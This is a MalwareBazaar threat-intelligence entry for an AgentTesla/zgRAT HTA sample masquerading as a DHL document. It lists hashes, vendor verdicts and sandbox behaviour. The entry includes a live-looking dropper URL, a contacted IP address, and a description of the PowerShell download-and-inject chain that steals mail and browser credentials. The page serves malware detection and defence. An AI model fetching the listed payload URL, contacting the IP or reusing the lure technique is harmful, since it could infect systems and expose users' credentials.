MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 fbf768ba44b398c246fc1faa033d3841e66dd799780082cdb61f6a4ba0299a26. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


AgentTesla


Vendor detections: 12


Intelligence 12 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: fbf768ba44b398c246fc1faa033d3841e66dd799780082cdb61f6a4ba0299a26
SHA3-384 hash: a125aa233d2ad2d31b42406f0b37789fbf0b56424f7932f492c961383119f4f0c1362efd9cbce7d19382d4c8b6a2f65a
SHA1 hash: 6ed55055522fc08ea0b196aaad1fd04f62de174f
MD5 hash: 138c57ecd75c9a9ec08d3e2ba490f4b7
humanhash: kitten-fix-west-rugby
File name:Documento de envio de DHL.pdf.hta
Download: download sample
Signature AgentTesla
Create hunting rule
File size:124'660 bytes
First seen:2023-10-30 18:13:30 UTC
Last seen:Never
File type:HTML Application (hta) hta
MIME type:text/html
ssdeep 3072:KG0QfY0+M0AkyTG5T29RTPiTg9dTzTgT4LTmTKgB:KG0QR+M0AS
TLSH T147C35C1116DFA08D71733F731ADD7AFA8E6FEFE1161A649AB24413038A61E40CE94673
TrID 66.6% (.TXT) Text - UTF-16 (LE) encoded (2000/1)
33.3% (.MP3) MP3 audio (1000/1)
Reporter malwarelabnet
Tags:AgentTesla hta zgRAT

Intelligence

File Origin
# of uploads :
1
# of downloads :
151
Origin country :
CA CA
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.VB.Trojan.Valyria.8400.13608.6649.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malicious
File Type:
HTA File - Malicious
Link:
https://app.docguard.net/fbf768ba44b398c246fc1faa033d3841e66dd799780082cdb61f6a4ba0299a26/results/dashboard
Behaviour
BlacklistAPI detected
Verdict:
No Threat
Threat level:
  10/10
Confidence:
100%
Tags:
masquerade
Link:
https://www.filescan.io/uploads/653ff26bb38131f117aaf23c/reports/0136c30f-586e-4173-a076-3333e67f3ba5/overview
Verdict:
Malicious
Labled as:
Valyria
Link:
https://www.hybrid-analysis.com/sample/fbf768ba44b398c246fc1faa033d3841e66dd799780082cdb61f6a4ba0299a26
Result
Verdict:
MALICIOUS
Result
Threat name:
AgentTesla, zgRAT
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1334440
Signature
Antivirus detection for URL or domain
Found malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell download and load assembly
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Generic Downloader
Yara detected zgRAT
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1334440 Sample: Documento_de_envio_de_DHL.pdf.hta Startdate: 30/10/2023 Architecture: WINDOWS Score: 100 26 imageupload.io 2->26 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus detection for URL or domain 2->40 42 7 other signatures 2->42 9 mshta.exe 1 2->9         started        signatures3 process4 signatures5 50 Suspicious powershell command line found 9->50 52 Very long command line found 9->52 12 powershell.exe 7 9->12         started        process6 signatures7 54 Suspicious powershell command line found 12->54 56 Found suspicious powershell code related to unpacking or dynamic code loading 12->56 15 powershell.exe 15 13 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 28 imageupload.io 172.67.222.26, 443, 49713 CLOUDFLARENETUS United States 15->28 30 185.254.37.174, 49714, 80 NETERRA-ASBG Germany 15->30 32 Writes to foreign memory regions 15->32 34 Injects a PE file into a foreign processes 15->34 21 RegAsm.exe 2 15->21         started        24 RegAsm.exe 15->24         started        signatures10 process11 signatures12 44 Tries to steal Mail credentials (via file / registry access) 21->44 46 Tries to harvest and steal browser information (history, passwords, etc) 21->46 48 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 24->48
Score:
100%
Verdict:
Malware
File Type:
ASCII
Link:
https://malprob.io/report/fbf768ba44b398c246fc1faa033d3841e66dd799780082cdb61f6a4ba0299a26
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/fbf768ba44b398c246fc1faa033d3841e66dd799780082cdb61f6a4ba0299a26/
Threat name:
Script-WScript.Trojan.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2023-10-30 14:03:13 UTC
File Type:
Text (VBS)
AV detection:
5 of 35 (14.29%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=7p3wrosewommerx4d6vagpjyihtg3v4zpaaiftnwd5vexibjtita._file
Result
Malware family:
zgrat
Create hunting rule
Score:
  10/10
Tags:
family:zgrat rat
Link:
https://tria.ge/reports/231030-wvax7sgd38/
Behaviour
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Checks computer location settings
Blocklisted process makes network request
Detect ZGRat V1
ZGRat
Malware Config
Dropper Extraction:
https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg
Malware family:
AgentTesla.v4
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/fbf768ba44b3/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
zgRAT
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/fbf768ba44b398c246fc1faa033d3841e66dd799780082cdb61f6a4ba0299a26

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Comments